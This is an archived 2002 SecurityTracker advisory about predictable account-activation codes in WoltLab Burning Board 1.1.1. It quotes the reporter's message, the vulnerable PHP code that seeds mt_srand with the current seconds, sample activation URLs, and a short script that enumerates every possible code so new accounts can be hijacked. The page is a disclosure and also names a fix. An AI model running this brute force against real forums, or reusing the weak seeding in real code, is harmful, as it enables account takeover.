SecurityTracker.com Archives - WoltLab Burning Board Forum Lets Remote Users Hijack Newly Assigned User Accounts

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Questions?

Want to learn about SecurityTracker? We've got answers to frequently asked questions right here

Category: Application (Forum/Board/Portal) > WoltLab Burning Board (wBB)

Vendors: Woltlab

WoltLab Burning Board Forum Lets Remote Users Hijack Newly Assigned User Accounts

SecurityTracker Alert ID: 1004390

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: May 28 2002

Impact: User access via network

Exploit Included: Yes

Version(s): 1.1.1

Description: An authentication vulnerability was reported in the WoltLab Burning Board web forum software. A remote user may be able to hijack a newly registered user account.

It is reported that WoltLab Burning Board (wBB) uses predictable or guessable temporary passwords when it creates a new user account. If another user has requested a new account but has not yet activated the registration, the user's account may be hijacked.

To determine how many users exist on the forum, a remote user can register for a new account. The remote user will receive a confirmation e-mail that contains the following type of URL to activate the account:

http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

In the above example, it is shown that any subsequent user will be assigned userid of 346 or higher. So, a remote user can attempt to guess the 'code' for any subsequent user. According to the report, the wBB software uses the date to seed a function that will generate only a limited number of codes (possibly 30 integer words). So, a remote user can feasibly conduct a brute force guessing attack to guess the proper code for a newly assigned user account.

A demonstration exploit that will apparently generate all of the possible codes is provided:

<?php
for($i=0; $i<60; $i++)
{
mt_srand($i);
echo mt_rand()."<BR>";
}
?>

Impact: A remote user may be able to guess the password of a newly requested user account before the user account registration has been activated.

Solution: No solution was available at the time of this entry.

Vendor URL: www.woltlab.de/ (Links to External Site)

Cause: Authentication error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: SeazoN <seazon@dnestr.com>

Message History: None.

Source Message Contents

Date: Sun, 26 May 2002 17:11:17 +0300
From: SeazoN <seazon@dnestr.com>
Subject: wbbboard 1.1.1 registration _new_users_vulnerability_

 

wbbboard 1.1.1 registration _new_users_vulnerability_
--------------------------------------------------
wbbboard  : i cant find any contact info in credits :(
            i send a message to wbbhacks.de and mywbb.de
            (support forums), they didnt reply for 3
            days (i think enough)

Affected program         : wbbboard 1.1.1
Vendor                   : http://www.woltlab.de/
Vulnerability-Class      : security bug
OS specific              : No
Remote                   : Yes
Problem-Skill            : High for users waiting for registration activatin
                           None for activated users

SUMMARY

wbboard is php & mysql based forum.

Here some code(register.php)
---------------------------
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
$db_zugriff->query("INSERT INTO bb".$n."_user_table
$db_zugriff->(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,acti
vation)
$db_zugriff->VALUES
$db_zugriff->('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)"
);
---------------------------
after that script mail to user@mail.dom with url for activation
here some code from action.php
---------------------------
if($action=="activation") {
        $result = activat($userid,$code);
        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\"
;");
        if($result == 2) eval ("\$output = \"".gettemplate("error22")."
\";");
        if($result == 3) eval ("\$output = \"".gettemplate("error23")."
\";");
        if(!$result) {
                $user_id = $userid;
                eval ("\$output = \"".gettemplate("note21")."\";"
);
                $user_password = getUserPW($userid);
                session_register("user_id");
                session_register("user_password");
                setcookie("user_id", "$user_id", time()+(3600*24*365));
                setcookie("user_password", "$user_password", time()+(3600*24*365)
);
        }
        $ride = "main.php?styleid=$styleid$session";
 

IMPACT

You can steal NEW user account with his passwords.

EXPLOIT

Register in forum you will recieve a message like this:
To continue registration
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
Now You Know how many users on forum and can hijak users with
 userid=346(for example)
 
HEART OF EXPLOIT
----------------------
| $datum = date("s");|
| mt_srand($datum);  |  this code result only 30 original integer words :)
| $z = mt_rand();    |  i think it is not so hard to bruteforce
----------------------
http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script
<?php
for($i=0; $i<60; $i++)
 
mt_srand($i);
echo mt_rand()."<BR>";
     ^^^^^^^^^ here you are :)
 
?>

 SOLUTION:
   use simple rand() or realy unpredictable md5(uniqid(rand(),1))

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2002, SecurityGlobal.net LLC